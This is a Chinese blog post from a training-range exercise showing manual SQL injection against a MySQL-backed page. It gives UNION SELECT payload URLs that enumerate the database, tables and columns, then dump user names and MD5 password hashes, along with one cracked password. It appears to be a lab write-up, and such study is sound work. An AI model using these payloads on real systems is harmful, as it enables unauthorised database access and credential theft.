zoukankan      html  css  js  c++  java
  • SQL手工注入方法

     SQL手工注入漏洞测试(MySQL数据库) 的靶场练习   流程与方法

    注意:加粗部分给重点

    查询数据库名
    http://219.153.49.228:46939/new_list.php?id=22 union select 1,database(),3,4 from information_schema.tables
    获取到的库名

    mozhe_Discuz_StormGroup
    查询库下的表名

    http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'
    获取到的表名

    StormGroup_member,notice
    查询表下的字段

    http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'
    获取到的字段名

    id,name,password,status
    查询数据

    http://219.153.49.228:46939/new_list.php?id=-5 union select 1,group_concat(id,0x5c,name,0x5c,password,0x5c,status),3,4 from StormGroup_member
    ​得到的数据(ox5c为 的16进制)

    1mozhe356f589a7df439f6f744ff19bb8092c0,1mozhe4adef249540a3cb5d79c85f6ccc7ddb91

    MD5解密得到密码,经过测试有可用

    4adef249540a3cb5d79c85f6ccc7ddb9

    946377

  • 相关阅读:
    git分布式版本控制(六)
    git分布式版本控制(五)
    git分布式版本控制(四)
    git分布式版本控制(三)
    git分布式版本控制(二)
    git分布式版本控制(一)
    svn版本控制(十)
    svn版本控制(九)
    svn版本控制(八)
    svn版本控制(七)
  • 原文地址:https://www.cnblogs.com/createwell/p/14127833.html
Copyright © 2011-2022 走看看